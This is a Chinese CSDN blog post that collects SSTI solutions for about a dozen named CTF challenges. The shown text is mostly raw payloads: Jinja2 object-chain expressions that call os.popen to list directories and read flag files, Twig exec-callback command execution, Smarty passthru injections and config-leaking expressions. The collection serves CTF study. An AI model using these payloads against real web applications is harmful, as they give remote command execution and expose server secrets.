SSTI漏洞相关的CTF题目

最新推荐文章于 2024-04-14 22:20:04 发布
最新推荐文章于 2024-04-14 22:20:04 发布
阅读量71 收藏
点赞数
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62725813/article/details/134893758
版权

1..[WesternCTF2018]shrine writeup

/shrine/{{url_for.__globals__}}

#current_app': <Flask 'app'>

/shrine/{{url_for.__globals__['current_app'].config}}

或者

/shrine/{{get_flashed_messages.__globals__['current_app'].config}}

2.[BJDCTF2020]Cookie is so stable 1

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

3.Bugku CTF 每日一题 聪明的php

?a={if passthru("ls -l")}{/if}

?a={if passthru("ls /")}{/if}

?a={if passthru("vi /_5791")}{/if}

或者

?a={if passthru("more /_5791")}{/if}

4.BugKu:Simple_SSTI(SSTI模板注入)

{{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}

{{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}

{{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}

5.web buuctf [BJDCTF2020]The mystery of ip1

xff={{system('ls /')}}  xff={{system('cat /flag')}}

6.BUUCTF[护网杯 2018]easy_tornado1-write up

输入以上两个命令却找不到cookie_secert,已知Tornado提供了一些对象别名来快速访问对象。Handler指向的处理当前这个页面的RequestHandler对象,handler是RequestHandler的别名,而上面又提到RequestHandler.settings是self.application.settings的别名。所以handler.settings就等于RequestHandler.application.settings。这个self是oneself的意思,哪个对象用就是哪个对象的.application.settings。

所以用handler.settings访问RequestHandler.application.settings:

即输入:/error?msg={{handler.settings}}

7.攻防世界WEB】难度四星12分进阶题:Confusion1

request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象( flask.request ) "

request.args.key   

args是参数,key可以是内置函数

——————

payload:

{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?&a=__class__&b=__mro__&c=__subclasses__&d=read

8.攻防世界 shrine 详解

python沙箱逃逸的方法是 利用python对象之间的引用关系来调用被禁用的函数对象

构造payloads:   /shrine/{{url_for.__globals__['current_app'].config['FLAG']}}

9.攻防世界-easytornado

error?msg={{handler.settings}}

/file?filename=/fllllllllllllag&filehash=725fcceacec29f3e90c03def6c8e6264

10.攻防世界之Web_python_template_injection (web进阶)

命令效果为执行popen()函数内的命令。

其中:

1、__ class__ _:查看变量所属的类

2、 __ init __ :初始化类,返回function

3、 __ globals __ : 获取function所处空间下可使用的module、方法以及所有变量

4、os.popen() 从一个命令打开一个管道

11.[BJDCTF2020]Cookie is so stable

我们只要把exec() 作为回调函数传进去就能实现命令执行了

payload:

{{_self.env.registerUndefinedFilterCallback("exec")}}

{{_self.env.getFilter("id")}}

所以payload至于要将"cat /flag" 替换"id" 即可。payload:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

12.[WesternCTF2018]shrine 1

{{url_for.__globals__['current_app'].config}}

{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}

m0_62725813
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SSTI漏洞介绍认识(flask、Werkzeup)
墨痕诉清风的博客
08-07 1006
根据上面的文件夹规则,我们在templates创建了一个index.html,然后再py文件中定义好需要渲染的内容,使用字典格式(请看下面的代码例子),一切准备就绪后,使用render_template将数据渲染过去index.html,如果有多个参数,请使用形参的形式传出,如下flask_tss.py文件代码所示,有三个参数,那么就用**contents传过去,contents是自定义的,这样子,参数值就会一个不落地传到index.html。下面是演示一个看起来没啥问题的代码,为什么这么说呢?...
SSTI漏洞原理及渗透测试
hunanjiushen的博客
02-01 389
SSTI漏洞原理及渗透测试
ctf_show笔记篇(web入门---SSTI
whale_waves的博客
04-08 1002
模板引擎是为了让用户界面以及业务数据分离开才产生的,模板引擎会生成特定的文档,然后通过模板引擎生成前端html代码,然后再获取用户数据再放到渲染函数里渲染,最后将生成的html代码个渲染好的数据结合拿给浏览器呈现给用户。
CTF之Simple_SSTI_1和Simple_SSTI_2
qq_74263993的博客
04-05 307
flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../../').read() }}flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}flag={{config}}就得到了flag。第一题第二题都一样,都是简单的SSTI漏洞,这里告诉我们传入的参数是flag。然后一个一个目录查看发现flag有关信息在app目录下。
CTF-web-ssti模板注入漏洞
最新发布
Ye的博客
04-14 976
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。SSTI 漏洞是一种常见的 Web 安全漏洞,它允许攻击者在服务器端模板引擎中注入恶意代码,导致服务器执行攻击者控制的代码,可能导致信息泄露、服务器被接管等安全问题。,那么页面上就会显示。
83 CTF夺旗-Python考点SSTI&反序列化&字符串
山兔的博客
02-07 1311
MISC(安全杂项):全称Miscellaneous。题目涉及流量分析、电子取证、人肉搜索、数据分析、大数据统计等等,覆盖面比较广。我们平时看到的社工类题目;给你一个流量包让你分析的题目;取证分析题目;都属于这类题目。主要考查参赛选手的各种基础综合知识,考察范围比较广。PPC(编程类):全称Professionally Program Coder。题目涉及到程序编写、编程算法实现。算法的逆向编写,批量处理等,有时候用编程去处理问题,会方便的多。当然PPC相比ACM来说,还是较为容易的。
SSTI(模板注入) 解析 和 ctf 做法
m0_56107268的博客
11-18 2794
ssti注入
CTF中Web各种题目的解题姿势
05-25
Web题型CTF中常考题型之一,它将实际渗透过程中的技术技巧转化为CTF赛题,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较多,知识面比较广泛,因此系统的总结和练习Web类题,是快速掌握出题人思路的一种有效的方法。
SSTI漏洞基础解析
小王的储物间
02-14 528
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
CTF—Python考点 SSTI&反序列化&字符串
qi_SJQ_的博客
03-01 4010
ctf题型分类: 1.CTF—Python—支付逻辑&JWT&反序列化: 题目:2019 CISCN 华北赛区Day1 Web2(全国大学生信息安全竞赛) 先写个爆破请求脚本,爬取请求到内容页面哪个存在lv6图片,得到在181页: 或者这个脚本,都可以: import requests url = "http://web44.buuoj.cn/" for i in range(1, 2000): r = requests.get(url + "shop?page=" + st
web安全-SSTI模板注入漏洞
weixin_61956136的博客
07-31 3658
web安全-SSTI模板注入漏洞
SSTI简单总结和例题
Aiwin的博客
07-21 2864
SSTI简单总结和例题CISCN 2019华东南]Double Secret和[护网杯 2018]easy_tornado
ctf show-web入门 SSTI篇部分题解
volcano的博客
02-04 4151
ctfshowSSTIweb361web362web363request.args传参绕过web364chr()绕过web365中括号绕过web366attr获取变量request.cookies传参web367web368 SSTI ssti模板注入基本原理推荐看这篇文章,这个师傅写的很详细,小白也很容易看懂。 web361 这个hackbar挺好用的,有现成模板,当前目录只有一个app.py,我们看一下上级目录 ?name={{ config.__class__.__init__.__globals_
SSTI例题buu[Flask]SSTI
cuddlylm的博客
04-08 3261
方法一:手注 打开只有这个 访问http://your-ip/?name={{233233}},得到54289,说明它执行了我们的命令,SSTI漏洞存在。 这里的54289是233233的运算结果 获取eval函数并执行任意python代码的POC: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals_
CTF题目记录8SSTI
kkzzjx
06-04 1452
# Web_python_template_injection flask模版注入不会啊,只能面向搜索引擎,已经入土了 首先是推荐两篇好文: [1.从零学习flask模板注入
SSTI (服务器模板注入)
热门推荐
Hydra的博客
11-02 2万+
 先来一波flask ssti漏洞的代码。 #python3 #Flask version:0.12.2 #Jinja2: 2.10 from flask import Flask, request from jinja2 import Template app = Flask(__name__) @app.route("/") def index(): name = request....
CTF SSTI 一些记录
3569
10-13 5844
https://ctftime.org/writeup/10895 https://www.xmsec.cc/ssti-and-bypass-sandbox-in-jinja2/   ▼▼▼Shrine(Web:solved 58/810=7.1%)▼▼▼ This writeup is written by @kazkiti_ctf GET / HTTP/1.1 Host: shri...
php沙盒绕过ctf,CTF SSTI(服务器模板注入)
weixin_33124479的博客
04-09 814
基本判断 渲染模板flask/jinjaflask SSTI的基本思路就是利用python中的魔术方法找到自己要用的函数__dict__ 保存类实例或对象实例的属性变量键值对字典__class__ 返回类型所属的对象__mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。__bases__ 返回该对象所继承的基类// __base__和__mro__都是用来寻...
SSTI注入,简单记录一下(config)
a3320315的博客
01-28 2507
输入数据有回显,看返回头是python写的后台,猜测有SSTI(加了个php模式的报错和index.php路由不知道有没有骗到某个师傅–) 然后接下来是绕WAF,我写了两个过滤,一个强过滤是匹配{{和}},目的是想让各位师傅用远程SSTI把flag打到自己服务器上。 然后是一个简单的单词匹配过滤os等敏感字符,只要FUZZ一下,再实验一下,会找到config这个大多数poc都用不上且过滤排在较后,...
buu ctf web进阶]ssti
08-23
在buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值